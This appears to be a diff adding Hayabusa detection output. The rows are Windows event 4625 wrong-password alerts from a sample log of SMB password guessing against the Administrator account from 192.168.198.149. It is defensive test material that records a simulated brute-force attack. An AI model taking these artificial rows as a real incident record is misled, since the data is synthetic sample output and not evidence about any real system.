+2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: plaXJ1rEGpU3SzV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I4pALF2luLfg36GC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZLO4cufbFcRhRy8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a845OfrFKxy31Yhg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QnPM7uhs8y4BaP6I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7fW5FzQ4jbWDJxXc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: huKy3ruTPAlx94pI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g78Kx7hkMuUGIoX1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: erSXtXvMi8Cg1PWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VaqXgO2US87zoXLl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QHEfAfFuAR2pX3LO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4Owk2elGaC5DOm1U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VXPynWzVNADN56a4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwfwZ0hXFaFwqymH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QYlZwLsvrsuqUZ4q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pvGrzr30eVl5TGhA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tqdJcHWbdGcIIHBr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YDt69bIJ1yI6PXLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtE2uMuOe8QPAKOj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BWQDlZDgFj9NmMhJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ncQiyLyHCXr8knGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XjVmLfmcPMYbmdin  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gU2HjzjDxHsnvENI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cUPn5CEz2LtwRwvZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCz069oBFXqpshbU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dzhc9PVRVP69tshD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ejA3ZNfKWEs8zAMX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U5egiL2PGOrYCHv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YYhIM3zla6KcbKbM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WjyQJnVBO4iC9Tkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g6Tpp8TRa2nRxHzo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DyLvo5Bn2HzyANdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NaXNThuZDGqJ7oCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 42Sb7p19cQsEV30b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: An6629wgflzSgqY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iO7JktEihqddmEtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nG97BFOgKxnZaqi4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SH2D24c6nRGDL4Oe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uiu2yfaM2JQQZoLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YQx9PG8DtR2tMjvS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OoAWryajKhLD7RyY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PgewSeaVugP1TXss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sPMCPdCAnz4upz8X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dUbV6xnGeBWE8Dif  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIJ9mZczFO1GKItV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wW0vxE4o68L70Sra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: upOn9DzB1yWtntyX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m9uGgocAVReiJWDm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qm9Jf1fles2HOb3g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ev5eTWdf3CskOMuh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QoiMO6sSLOm4fOD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xDjvMsa2IgR9KO7l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SR7gVjxHZDYeK7pJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4jzGAepr7JeNKuuk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H9baxEeRCWjx6Fzr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uy7aTt0B4ErguacA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nvKcLrUXqu2vTKO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PLycXLeAU21pdnXL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SgwjJSKOPnurDWW4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YPDYdxPoQAl8aGMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CX8knunlT6SMpmQw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AAjYbt50leZt3Xve  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3CD0HUCdg4UWOiji  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dkeWmTE1R1rYaYP8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W87qcfSj4qWWUv4k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WUCyUQgbUqwaLj3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9nLhDbcvmVBZp4f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BBWo1zDdjaAeGDWW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vjHRFk2flmzzd1zg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 53HYxs9s7fpP1y6V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tluqXKvVooP7VNyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 43m0nfi5tiv4TpSB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
